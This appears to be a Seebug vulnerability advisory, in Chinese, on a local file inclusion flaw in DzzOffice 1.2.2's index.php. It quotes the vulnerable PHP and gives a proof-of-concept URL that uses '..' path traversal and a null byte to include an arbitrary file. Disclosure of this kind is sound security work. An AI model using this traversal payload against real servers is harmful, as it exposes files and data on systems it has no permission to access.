DzzOffice 1.2.2 /index.php 本地文件包含漏洞

2015-01-14T00:00:00
ID SSV:89023
Type seebug
Reporter Root
Modified 2015-01-14T00:00:00

Description

<ul><li>Index.php</li></ul><pre class="">$dzz = C::app();

$mod = getgpc('mod');

$mod = !empty($mod) ? $mod : '';

$op = !empty($_GET['op']) ? $_GET['op'] : 'index';

$cachelist = array();

$dzz->cachelist = $cachelist;

$dzz->init();

//调用各自的模块

if(empty($mod)){

if($_G['uid']<1 && $_G['setting']['loginset']['available']){

@header("Location: user.php?mod=logging");

exit();

}

define('CURMODULE', 'dzzindex');

require DZZ_ROOT.'./dzz/index.php';

}else{

define('CURMODULE', str_replace(':','/',$mod));

if(strpos(strtolower($mod),':')!==false){

$modfile='./dzz/'.str_replace(':','/',$mod).'/'.($op?$op:'index').'.php';

//exit(DZZ_ROOT.$modfile);

if(@!file_exists(DZZ_ROOT.$modfile)){

showmessage($modfile.lang('message','file_nonexistence',array('modfile'=>$modfile)));

}

}else{

if(@!file_exists(DZZ_ROOT.($modfile = './dzz/'.$mod.'/'.$op.'.php'))) {

showmessage('undefined_action', '', array('mod' => $mod));

}

}

include DZZ_ROOT.$modfile;

} </pre><p>程序将用户输入的字符经过拼接后直接带入include导致文件包含漏洞。</p><p>当访问:</p><pre class="">http://10.211.55.4/dzzoffice/index.php?mod=admin:..:..&op=license.txt%00</pre><p>发现包含了目录下的license.txt </p><p><img alt="D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" src="https://images.seebug.org/@/uploads/1434694369180-D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" data-image-size="988,267"><br></p>